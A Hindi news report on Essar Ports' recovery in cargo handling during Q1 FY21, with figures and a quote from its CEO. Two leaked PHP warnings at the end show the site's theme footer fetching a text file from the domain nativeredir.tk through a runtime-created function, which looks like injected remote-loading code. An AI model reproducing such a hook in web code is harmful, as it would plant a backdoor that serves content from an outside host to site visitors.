एस्‍सार पोर्ट्स का आर्थिक प्रदर्शन दृष्टि से तुरंत व टिकाऊ रिकवरी पर जोर

Edit-Rashmi Sharma

जयपुर 07 जुलाई 2020 – कोविड-19 के बढ़ते प्रकोप को रोकने लिए इस वर्ष मार्च और मई के बीच दुनिया का सबसे बड़ा लॉकडाउन भारत में भी लगाया गया। कारोबार चलने बंद हो गये और इसका प्रभाव सभी उद्योगों पर पड़ा। वित्‍त वर्ष 202-21 की पहली तिमाही में, व्‍यवसायों ने नवोन्‍मेष और नवाचार के जरिए स्‍वयं को परिस्थितियों के अनुकूल बनाये रखने की कोशिश की है, ताकि वो पहले की तरह परिचालन करते हुए अपना प्रदर्शन पूर्ववत बनाये रख सकें।

एस्‍सार पोर्ट्स पर, इसके प्रमुख ग्राहकों – मुख्‍य रूप से विद्युत एवं स्‍टील क्षेत्र की कंपनियों के घटते उत्‍पादन के चलते कार्गो हैंडलिंग में कमी आई। हालांकि, वित्‍त वर्ष’21 की पहली तिमाही अर्थात 30 जून 2020 को समाप्‍त तिमाही के दौरान, एस्‍सार पोर्ट्स ने 11.23 मिलियन टन की शानदार कार्गो हैंडलिंग दर्ज कराई; अप्रैल के टन भार मुकाबले जून 2020 में कार्गो हैंडलिंग में 75 प्रतिशत की बढ़ोत्‍तरी हुई।

कार्गो हैंडलिंग प्रदर्शन

  Q1 FY21 अप्रैल’20 जून ’20 वृद्धि
एस्‍सार पोर्ट्स 11.23 मिलियन टन 2.52 मिलियन टन 4.41 मिलियन टन 75%

 

एस्‍सार पोर्ट्स लिमिटेड के मुख्‍य कार्यकारी अधिकारी व प्रबंध निदेशक, श्री राजीव अग्रवाल ने बताया, ”एस्‍सार पोर्ट्स को माननीय प्रधानमंत्री के आत्‍मनिर्भर भारत के सपने के ऐलान पर गर्व है। जून 2020 में, देश भर में अनलॉक#1 शुरू हुआ, और अर्थव्‍यवस्‍था के रिकवरी के संकेत तुरंत मिलने शुरू हो गये। हमारे टर्मिनल्‍स, जो लॉकडाउन के विभिन्‍न चरणों की चुनौतियों के बावजूद चालू रहे, ने 11.23 मिलियन टन की शानदार कार्गो हैंडलिंग दर्ज कराया है। हम यह सुनिश्चित करने के लिए पूरी तरह से तैयार हैं कि देश के विकास के वाहक गतिशील और सबसे प्रभावी तरीके से कार्य करें।”


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1